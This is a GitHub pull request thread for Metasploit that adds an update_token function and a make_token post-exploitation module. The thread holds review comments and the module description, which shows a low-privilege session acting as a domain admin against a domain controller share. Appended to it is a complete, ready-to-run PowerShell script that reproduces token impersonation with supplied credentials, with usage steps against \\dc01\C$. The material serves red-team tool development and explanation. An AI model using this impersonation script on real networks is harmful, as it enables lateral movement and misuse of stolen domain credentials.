Add update_token to MSF + make_token post-ex module #18022
Conversation
```ruby
# send warning
if logontype == 'LOGON32_LOGON_NEW_CREDENTIALS'
  print_warning("Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)")
end
```
Do you have any context you can provide as to why this is only the case for this particular logon type?
I believe the LOGON32_LOGON_NEW_CREDENTIALS logontype is the only one that duplicates the original access token of the user, thus has no result on local actions. It only updates the logon session ID to a new logon session with the specified credentials for network access.
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

```ruby
def run
  # Make sure we meet the requirements before running the script
  fail_with(Failure::NoTarget, 'This module requires a meterpreter session') unless session.type == 'meterpreter'
end
```
BadConfig might be a better fit for this error because the session is user configurable.
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
@attl4s The payloads side of this has been landed and the gem has been bumped so we're no longer blocked on that. The last two things we need for this to get landed is for the module docs to be written and for the module to be linted.
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be run from the root directory of Metasploit:
You can automate most of these changes with the
Please update your branch after these have been made, and reach out if you have any problems.
Everything looks good to me and I've gone ahead and landed this module.
I made a few minor changes in d8870d7 to bring the module docs inline with the standard format and address the warnings from msftidy_docs.rb. Thanks for this contribution!
Release Notes: This adds the
This PR adds the ruby code needed to leverage the new `update_token` function explained at rapid7/metasploit-payloads#648, for Meterpreter's stdapi extension. It also adds a new post-ex module using the new functionality: `post/windows/manage/make_token`

This module mimics Cobalt Strike's `make_token` command. In its default configuration, this module creates a new network security context with the specified logon data (username, domain and password). Under the hood, Meterpreter's access token is cloned, and a new logon session is created and linked to that token. The token is then impersonated to acquire the new network security context. This module has no effect on local actions - only on remote ones (where the specified credential material is used) and it does not validate the credentials specified. For advanced users, the default logon type (`LOGON32_LOGON_NEW_CREDENTIALS`) can be changed to any other valid value. An example can be seen below.

The Meterpreter session is running as `CAP\vegeta` (low-priv domain user). With plaintext credentials, we can use the new module to act on behalf of `CAP\bulma_da` (domain admin) in the network. As can be seen, the directory listing call to `\\dc01\C$` works after using the module.
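To make the two points in this thread concrete (the reviewer's remark that only `LOGON32_LOGON_NEW_CREDENTIALS` leaves local actions untouched, and the PR description's note that the credentials are not validated), here is an added example that reproduces the make_token behaviour directly from PowerShell with the Win32 API. It is not code from this PR or from Metasploit; it is how the same Windows primitives behave outside Meterpreter. The domain `CAP`, the user `bulma_da`, and the share `\\dc01\C$` are taken from the PR description purely as illustration, and the password is a placeholder you must replace.

```powershell
# Added example, not part of the PR or of Metasploit.
# Reproduces make_token: LogonUser with LOGON32_LOGON_NEW_CREDENTIALS, then impersonate.
# Assumptions (placeholders): domain CAP, user bulma_da, share \\dc01\C$, password below.

$sig = @'
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool LogonUserW(string user, string domain, string password,
                                     int logonType, int logonProvider, out IntPtr token);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool ImpersonateLoggedOnUser(IntPtr token);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool RevertToSelf();
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr handle);
'@
$Native = Add-Type -MemberDefinition $sig -Name 'TokenApi' -Namespace 'MakeTokenDemo' -PassThru

$LOGON32_LOGON_NEW_CREDENTIALS = 9   # alternate credentials for outbound network use only
$LOGON32_PROVIDER_WINNT50      = 3   # the provider NEW_CREDENTIALS requires

function Invoke-MakeToken {
    # Returns the impersonated token handle; caller must RevertToSelf and CloseHandle.
    param(
        [Parameter(Mandatory)] [string] $User,
        [Parameter(Mandatory)] [string] $Domain,
        [Parameter(Mandatory)] [string] $Password,
        [int] $LogonType = $LOGON32_LOGON_NEW_CREDENTIALS
    )
    $token = [IntPtr]::Zero
    $ok = $Native::LogonUserW($User, $Domain, $Password, $LogonType,
                              $LOGON32_PROVIDER_WINNT50, [ref] $token)
    if (-not $ok) {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        throw "LogonUser failed: $([ComponentModel.Win32Exception]::new($err).Message)"
    }
    if (-not $Native::ImpersonateLoggedOnUser($token)) {
        $Native::CloseHandle($token) | Out-Null
        throw "ImpersonateLoggedOnUser failed"
    }
    if ($LogonType -eq $LOGON32_LOGON_NEW_CREDENTIALS) {
        # Mirrors the module's warning: the token is a clone of the caller's token with a
        # new logon session attached, so the local identity does not change and the
        # credentials are NOT checked until something actually talks to the network.
        Write-Warning "NEW_CREDENTIALS: local identity unchanged; credentials not validated"
    }
    return $token
}

# --- Usage ---------------------------------------------------------------------
$before = [Security.Principal.WindowsIdentity]::GetCurrent().Name
$tok = Invoke-MakeToken -User 'bulma_da' -Domain 'CAP' -Password 'REPLACE_ME'   # placeholder
$after = [Security.Principal.WindowsIdentity]::GetCurrent().Name
"local identity: $before -> $after"          # identical: the getuid-style check sees no change

# Remote action now authenticates as CAP\bulma_da (fails here if the password was wrong)
Get-ChildItem '\\dc01\C$' | Select-Object -First 3

$Native::RevertToSelf() | Out-Null           # drop the impersonation (module's revert step)
$Native::CloseHandle($tok) | Out-Null
```

Run this from a plain `powershell.exe` console rather than an ISE or background runspace: impersonation is per-thread, and the `Get-ChildItem` call must execute on the same thread that called `ImpersonateLoggedOnUser`. Passing a wrong password is a useful check of the "no validation" caveat: `LogonUserW` still succeeds with logon type 9, the identity string is still unchanged, and only the UNC listing fails with an access-denied or logon-failure error.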